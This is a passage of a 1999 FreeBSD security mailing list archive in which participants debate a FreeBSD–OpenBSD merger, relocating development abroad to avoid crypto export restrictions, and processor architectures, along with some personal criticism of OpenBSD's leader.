"unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 23:12: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id A2E8115713 for ; Tue, 17 Aug 1999 23:11:58 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id IAA29325; Wed, 18 Aug 1999 08:09:42 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Brett Glass Cc: "Thomas Uhrfelt" , "James Gill" , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-reply-to: Your message of "Tue, 17 Aug 1999 23:44:29 MDT." <4.2.0.58.19990817234258.0479b3b0@localhost> Date: Wed, 18 Aug 1999 08:09:41 +0200 Message-ID: <29323.934956581@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.0.58.19990817234258.0479b3b0@localhost>, Brett Glass writes: >One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained >on quite a few CPUs and machine architectures. Would FreeBSD be willing to >go that route? Yes, if sufficient hackers come with the code. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 0:30:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from nexus.plymovent.se (nexus.plymovent.se [212.247.77.253]) by hub.freebsd.org (Postfix) with ESMTP id DA1E814D50 for ; Wed, 18 Aug 1999 00:30:16 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from tu ([192.168.1.21]) by nexus.plymovent.se (8.9.3/8.9.3) with SMTP id JAA04318; Wed, 18 Aug 1999 09:37:08 +0200 (CEST) (envelope-from thomas.uhrfelt@plymovent.se) From: "Thomas Uhrfelt" To: "Poul-Henning Kamp" Cc: Subject: RE: OpenBSD Date: Wed, 18 Aug 1999 09:28:23 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <29323.934956581@critter.freebsd.dk> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >One snag, though: OpenBSD, like NetBSD, is cross-platform and is > maintained > >on quite a few CPUs and machine architectures. Would FreeBSD be > willing to > >go that route? > > Yes, if sufficient hackers come with the code. An additional benefit from a major merger like this would be a huge display of strenght from BSD camp through this unification. FreeBSD itself faces a platform issue when the merced is going into full production and I can see some benefits from having people used to developing for multiple platforms in the FreeBSD project when we are faced with this task. I am not a programmer, not am I a brilliant sysadmin like many in here. I am just a happy user of FreeBSD and will continue to be so for many years to come. So my opinions should be taken very lightly when it comes to a big and serious issue like this. Regards, Thomas Uhrfelt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 1:21:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 2CA72156B3 for ; Wed, 18 Aug 1999 01:21:10 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id BAA78059; Wed, 18 Aug 1999 01:21:07 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: "James Gill" Cc: freebsd-security@freebsd.org Subject: Re: OpenBSD In-reply-to: Your message of "Fri, 13 Aug 1999 00:53:37 EDT." Date: Wed, 18 Aug 1999 01:21:07 -0700 Message-ID: <78055.934964467@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I dunno, perhaps this is an opportune time to try to coordinate the > projects? It's never been a question of money, coordination, or really anything at all to do with engineering. It has everything to do with one or more individuals volunteering the time necessary for making something like this happen. That also goes for just about every other obvious idea or clear shortcoming that one might note for FreeBSD - if it's obvious or clear, chances are excellent that it's been both suggested many times and failed many times due to lack of this one key missing ingredient. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 6:29:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (host-034.canadiantire.ca [209.146.201.34]) by hub.freebsd.org (Postfix) with ESMTP id 1E635157E5 for ; Wed, 18 Aug 1999 06:29:29 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.9.3/8.9.3) id JAA11366; Wed, 18 Aug 1999 09:27:13 -0400 (EDT) (envelope-from dgilbert) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14266.46257.592595.362846@trooper.velocet.ca> Date: Wed, 18 Aug 1999 09:27:13 -0400 (EDT) To: Garance A Drosihn Cc: "James Gill" , Subject: Re: OpenBSD In-Reply-To: References: X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Garance" == Garance A Drosihn writes: Garance> At 12:53 AM -0400 8/13/99, James Gill wrote: >> I dunno, perhaps this is an opportune time to try to coordinate the >> projects? Garance> It is always a good time to coordinate them. The trick is in Garance> actually doing the coordination... :-) Garance> I assume you're suggesting that the freebsd project pay the Garance> openbsd project some amount such that the openbsd project Garance> (outside the USA) could maintain some security-related pieces Garance> meant for FreeBSD, and thus avoid the US export-control Garance> issues? I don't know how well that would work. If it's Garance> workable, it might be advantageous for both projects. The other option, of course, is to establish a home for FreeBSD (or at least FreeBSD security) that is outside the non-free US :) somewhere. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 8:11: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 2DE4414EDD for ; Wed, 18 Aug 1999 08:11:04 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA08398; Wed, 18 Aug 1999 09:10:58 -0600 (MDT) Message-Id: <4.2.0.58.19990818090642.04808ec0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Wed, 18 Aug 1999 09:07:55 -0600 To: Poul-Henning Kamp From: Brett Glass Subject: Re: OpenBSD Cc: "Thomas Uhrfelt" , "James Gill" , freebsd-security@FreeBSD.ORG In-Reply-To: <29323.934956581@critter.freebsd.dk> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 08:09 AM 8/18/99 +0200, Poul-Henning Kamp wrote: >In message <4.2.0.58.19990817234258.0479b3b0@localhost>, Brett Glass writes: > > >One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained > >on quite a few CPUs and machine architectures. Would FreeBSD be willing to > >go that route? > >Yes, if sufficient hackers come with the code. Well, they've already come with the code. Twice, yet: we have NetBSD *and* OpenBSD. Hey, now THERE would be an event that would get the BSDs some positive press: a Great Unification. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 8:11: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id CFDF114E16 for ; Wed, 18 Aug 1999 08:11:04 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA08404; Wed, 18 Aug 1999 09:11:11 -0600 (MDT) Message-Id: <4.2.0.58.19990818090832.04805220@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Wed, 18 Aug 1999 09:10:49 -0600 To: "Jordan K. Hubbard" , "James Gill" From: Brett Glass Subject: Re: OpenBSD Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <78055.934964467@localhost> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:21 AM 8/18/99 -0700, Jordan K. Hubbard wrote: >It's never been a question of money, coordination, or really anything >at all to do with engineering. It has everything to do with one or >more individuals volunteering the time necessary for making something >like this happen. > >That also goes for just about every other obvious idea or clear >shortcoming that one might note for FreeBSD - if it's obvious or >clear, chances are excellent that it's been both suggested many times >and failed many times due to lack of this one key missing ingredient. :) With a larger (merged) talent pool, it'd be more likely to succeed. The biggest trick, of course, would be dealing with personalities, not code. I'll say this much, though: the OpenBSD approach to crypto export restrictions (i.e. keeping the code in Canada) is brilliant and could help FreeBSD. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 8:39: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from tandem.milestonerdl.com (tandem.milestonerdl.com [204.107.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 9BA4515925 for ; Wed, 18 Aug 1999 08:38:49 -0700 (PDT) (envelope-from marc@tandem.milestonerdl.com) Received: from localhost (marc@localhost) by tandem.milestonerdl.com (8.9.3/8.9.3) with ESMTP id MAA10546; Wed, 18 Aug 1999 12:09:33 -0500 (CDT) Date: Wed, 18 Aug 1999 12:09:33 -0500 (CDT) From: marc rassbach To: Brett Glass Cc: "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-Reply-To: <4.2.0.58.19990818090832.04805220@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Aug 1999, Brett Glass wrote: > At 01:21 AM 8/18/99 -0700, Jordan K. Hubbard wrote: > I'll say this much, though: the OpenBSD approach to crypto export restrictions > (i.e. keeping the code in Canada) is brilliant and could help FreeBSD. If 'we' wish to 'move' the location of the OFFICIAL FreeBSD (or ANY OpenSource) project, perhaps a search of the various laws of the world would come up with an ideal home. Perhaps some country is willing to create a 'OpenSource law friendly' space within its borders. I wonder what laws apply in antartica? (I'm betting that moving the *BSD projects to Antiartic would get press also. To keep the natives happy...we bring fishfor the penguins. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 9:16:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail-gw5.pacbell.net (mail-gw5.pacbell.net [206.13.28.23]) by hub.freebsd.org (Postfix) with ESMTP id 520E3158BA for ; Wed, 18 Aug 1999 09:16:18 -0700 (PDT) (envelope-from dean@thegrid.net) Received: from remus (adsl-63-193-246-169.dsl.snfc21.pacbell.net [63.193.246.169]) by mail-gw5.pacbell.net (8.9.3/8.9.3) with SMTP id JAA01555 for ; Wed, 18 Aug 1999 09:16:16 -0700 (PDT) Message-Id: <4.1.19990818090916.00971540@mail.thegrid.net> X-Sender: i289861@mail.thegrid.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 18 Aug 1999 09:11:05 -0700 To: freebsd-security@freebsd.org From: Dean Subject: Re: "Secure-FreeBSD" Idea In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 07:42 AM 8/13/99 -0500, you wrote: > > >On Fri, 13 Aug 1999, Michael Richards wrote: >> >> I was toying with this idea too. People often say when comparing FreeBSD >> and linux that "FreeBSD is harder to install." Although I don't agree with >> that statement, I had to take note on how easy my install of BeOS went. >> Basically I popped the CD in, selected the partition and hit install. It >> whirled rebooted and presto, I was running Be. > >I recently installed Redhat and FreeBSD...I am familiar with both, but the >Redhat install took 3 runs through the install process to get right, and >FreeBSD took only one...Granted, they were minor problems in redhat that >most people wouldn't come across, but it is still one valid experience of >mine...(The FreeBSD install was more flexible than the redhat one). > >--dave And don't even mention the mkLinuX installer (which is the redhat installer). But aren't we getting a little off topic here? Dean ------------------------------------------------------------------------------- A train stops at a train station, a bus stops at a bus staion. On my desk, I have a workstation.... ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 9:40:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from topsecret.net (gill.apk.net [207.54.148.62]) by hub.freebsd.org (Postfix) with SMTP id 1FC9C14FBA for ; Wed, 18 Aug 1999 09:40:15 -0700 (PDT) (envelope-from gill@topsecret.net) Received: from stumpy by topsecret.net with SMTP (MDaemon.v2.7.SP5.R) for ; Wed, 18 Aug 1999 12:39:02 -0400 From: "James Gill" To: , "'Freebsd-Security@Freebsd. Org'" Cc: "Harry M. Leitzell" Subject: OpenBSD (FW: Please do not take this above statement too lightly, since the project is typically not in strong financial health.) Date: Wed, 18 Aug 1999 12:38:23 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG X-Return-Path: gill@topsecret.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, Harry, I guess you were right. Nevermind, go back to your chores. (cores?) --gill -----Original Message----- From: Theo de Raadt [mailto:deraadt@cvs.openbsd.org] Sent: Wednesday, August 18, 1999 12:05 PM Subject: Re: Please do not take this above statement too lightly, since the project is typically not in strong financial health. Not in your life. Sorry. You better read up on history. http://theos.com/deraadt/coremail And search archives. > > Hi Theo. > > You don't know me, I'm just a (relatively new) *BSD user making his > way in the world out of the clutches of a microsoft-dominated > landscape. > > While exploring the *BSD community I learned of the different projects > (Free, Open, Net) and wondered aloud why these projects were not more > closely aligned. When I read on your website that the project was in > grave danger due to lack of funding I became concerned because in my > security work I've heard OpenBSD highly regarded and I anticipate that > the future can only bring further improvements. > > My concern lead me to make some posts in the freebsd-security mailing > list where I made the following comment and recived the response from > one Jordan K. Hubbard: > ------------------------------------------------ > > I dunno, perhaps this is an opportune time to try to coordinate the > > projects? > > It's never been a question of money, coordination, or really anything > at all to do with engineering. It has everything to do with one or > more individuals volunteering the time necessary for making something > like this happen. > > That also goes for just about every other obvious idea or clear > shortcoming that one might note for FreeBSD - if it's obvious or > clear, chances are excellent that it's been both suggested many times > and failed many times due to lack of this one key missing ingredient. > :) > > - Jordan > ------------------------------------------------ > > And before I go and open my big mouth and say how excited I would be > to do My Part, I wanted to know what your views were on the situation? > How willing is OpenBSD to try to coordinate it's strengths with the > FreeBSD project and vice versa to implement the best of both? > > regards, > --gill > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 12:27:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 923531527D for ; Wed, 18 Aug 1999 12:27:23 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id MAA25388; Wed, 18 Aug 1999 12:23:40 -0700 (PDT) Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id MAA13953; Wed, 18 Aug 1999 12:17:28 -0700 Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id NAA05251; Wed, 18 Aug 1999 13:23:21 -0600 Message-ID: <37BB0829.CFF28FCE@softweyr.com> Date: Wed, 18 Aug 1999 13:23:21 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: marc rassbach Cc: Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org marc rassbach wrote: > > If 'we' wish to 'move' the location of the OFFICIAL FreeBSD (or ANY > OpenSource) project, perhaps a search of the various laws of the world > would come up with an ideal home. > > Perhaps some country is willing to create a 'OpenSource law friendly' > space within its borders. > > I wonder what laws apply in antartica? (I'm betting that moving the *BSD > projects to Antiartic would get press also. To keep the natives > happy...we bring fishfor the penguins. :-) Not a bad idea, we'd only need one person to staff the office in order to make it official. The network link in is going to cost a bit though. Jordan, are you packing yet? I'll pony up $100 towards the cost of skis for your airplane. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 12:27:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id EB5CA1527D for ; Wed, 18 Aug 1999 12:27:45 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id MAA25420; Wed, 18 Aug 1999 12:24:34 -0700 (PDT) Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id MAA13995; Wed, 18 Aug 1999 12:18:22 -0700 Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id NAA05262; Wed, 18 Aug 1999 13:24:29 -0600 Message-ID: <37BB086C.6CC4261E@softweyr.com> Date: Wed, 18 Aug 1999 13:24:28 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Poul-Henning Kamp , Thomas Uhrfelt , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD References: <4.2.0.58.19990818090642.04808ec0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > Hey, now THERE would be an event that would get the BSDs some positive > press: a Great Unification. At least this one managed to stay dead for more than a year this time. Please don't encourage this by following up to it. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 12:47:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 79418151BF; Wed, 18 Aug 1999 12:47:08 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id MAA25784; Wed, 18 Aug 1999 12:46:31 -0700 (PDT) Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id MAA14768; Wed, 18 Aug 1999 12:40:04 -0700 Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id NAA05477; Wed, 18 Aug 1999 13:46:12 -0600 Message-ID: <37BB0D83.27927148@softweyr.com> Date: Wed, 18 Aug 1999 13:46:11 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: James Gill Cc: freebsd-chat@FreeBSD.ORG, "'Freebsd-Security@Freebsd. Org'" , "Harry M. Leitzell" Subject: Re: OpenBSD (FW: Please do not take this above statement too lightly, since the project is typically not in strong financial health.) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Gill wrote: > Theo de Raadt [mailto:deraadt@cvs.openbsd.org] wrote: > > > > Sorry. You better read up on history. > > > > http://theos.com/deraadt/coremail > > > > And search archives. > > Well, Harry, I guess you were right. > > Nevermind, go back to your chores. (cores?) This is a pretty one-sided archive, omitting most of what Theo said. Look it up in the archives yourself, and look up some of the incidents that lead up to it. It was certainly not the childish reaction Theo paints it as. Theo is very abrupt and thinks everyone in the world other than himself should have skin 3 feet thick, while he is VERY quick to take insult at any reference he doesn't consider complimentary. OpenBSD has been hanging by a financial thread since the day Theo created it because it is Theo's baby, Theo doesn't make (much) money from it or any- thing else, and because Theo fails to attract any considerable development team because he is rude and arrogant. I'm continually amazed at the abrupt, curt, and rude answers I get to every correspondence with Theo or OpenBSD.org, even when I am offering some small item of help. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 13: 2:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 81220152DD for ; Wed, 18 Aug 1999 13:02:08 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id XAA20954; Wed, 18 Aug 1999 23:01:36 +0300 (EEST) Date: Wed, 18 Aug 1999 23:01:36 +0300 (EEST) From: Narvi To: Wes Peters Cc: marc rassbach , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-Reply-To: <37BB0829.CFF28FCE@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Aug 1999, Wes Peters wrote: > marc rassbach wrote: > > > > If 'we' wish to 'move' the location of the OFFICIAL FreeBSD (or ANY > > OpenSource) project, perhaps a search of the various laws of the world > > would come up with an ideal home. > > > > Perhaps some country is willing to create a 'OpenSource law friendly' > > space within its borders. > > > > I wonder what laws apply in antartica? (I'm betting that moving the *BSD > > projects to Antiartic would get press also. To keep the natives > > happy...we bring fishfor the penguins. :-) > > Not a bad idea, we'd only need one person to staff the office in order to > make it official. The network link in is going to cost a bit though. > Jordan, are you packing yet? I'll pony up $100 towards the cost of skis > for your airplane. > So what we really need is canfug (provided it exists) to take over the management of the main cvs server which relocates to Canada? > -- > "Where am I, and what am I doing in this handbasket?" > > Wes Peters Softweyr LLC > http://softweyr.com/ wes@softweyr.com > Sander There is no love, no good, no happiness and no future - all these are just illusions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 13: 9:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 2C31415B32 for ; Wed, 18 Aug 1999 13:08:56 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id WAA02311; Wed, 18 Aug 1999 22:06:18 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Wes Peters Cc: marc rassbach , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-reply-to: Your message of "Wed, 18 Aug 1999 13:23:21 MDT." <37BB0829.CFF28FCE@softweyr.com> Date: Wed, 18 Aug 1999 22:06:18 +0200 Message-ID: <2309.935006778@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37BB0829.CFF28FCE@softweyr.com>, Wes Peters writes: >> I wonder what laws apply in antartica? (I'm betting that moving the *BSD >> projects to Antiartic would get press also. To keep the natives >> happy...we bring fishfor the penguins. :-) > >Not a bad idea, we'd only need one person to staff the office in order to >make it official. The network link in is going to cost a bit though. >Jordan, are you packing yet? I'll pony up $100 towards the cost of skis >for your airplane. Antartica is a UN protectorate, you cannot setup a business there, and I doubt they would allow us either. I hate to think about the cost of the T1 line too. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 13:15:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from tandem.milestonerdl.com (tandem.milestonerdl.com [204.107.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 77CB71522E for ; Wed, 18 Aug 1999 13:15:33 -0700 (PDT) (envelope-from marc@tandem.milestonerdl.com) Received: from localhost (marc@localhost) by tandem.milestonerdl.com (8.9.3/8.9.3) with ESMTP id QAA11336; Wed, 18 Aug 1999 16:46:22 -0500 (CDT) Date: Wed, 18 Aug 1999 16:46:22 -0500 (CDT) From: marc rassbach To: Narvi Cc: Wes Peters , Brett Glass , "Jordan K. Hubbard" , James Gill , freebsd-security@FreeBSD.ORG Subject: Re: OpenBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Aug 1999, Narvi wrote: > So what we really need is canfug (provided it exists) to take over the > management of the main cvs server which relocates to Canada? Canada *MAY* not be the best place. Keep in mind OTHER legal issues exist. Like the proposed law that would make reverese-engineering illegal (as opposed to a licence violation) etc la. I'm *NOT* a legal beagle, nor do I play one on the InterNet (much anyway). But if any kind of move is thought of, WHERE to move to should be researched. And who knows, perhaps some up-and-comming-country would be willing to make an place with laws that are pro-OpenSource, w/o stepping on the rights of the closedsource world. And if no such place on this planet can be found, in a few years, there's always a space station. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 13:17: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 608) id DC37214FF0; Wed, 18 Aug 1999 13:17:02 -0700 (PDT) From: "Jonathan M. Bresler" To: mike@argos.org Cc: brett@lariat.org, freebsd-security@FreeBSD.ORG In-reply-to: (message from Mike Nowlin on Wed, 18 Aug 1999 01:58:02 -0400 (EDT)) Subject: Re: OpenBSD Message-Id: <19990818201702.DC37214FF0@hub.freebsd.org> Date: Wed, 18 Aug 1999 13:17:02 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > I'd sure hope so... Let's face it -- even though FreeBSD is (in my > opinion) the most "robust" out of the bunch, the x86 architecture isn't > going to win any awards for performance.... Cheap, yes. Easy, yes. > Works for the most part, yes. But it's still based off of the idea that > we need to be backwards-compatible with the late 1700's. The Alpha port > of FBSD is A Good Thing (I'm hoping to try it out this weekend on a couple > of the Alpha machines I have available for playing with), but the high-end > boxes are pretty pricey. You can find multi-processor SPARC machines > being practically given away by companies who don't know what they're > capable of, not to mention several other platforms. thisis incorrect. the intel processors knock the snot out of sparc in inteeger performance. take a look at the hint benchmark for example. the benchmark is in the ports tree. the alpha on the other hand knocks the intel flat on the matt. jmb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 18 13:18:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id DA2DC156F3 for ; Wed, 18 Aug 1999 13:18:44 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id 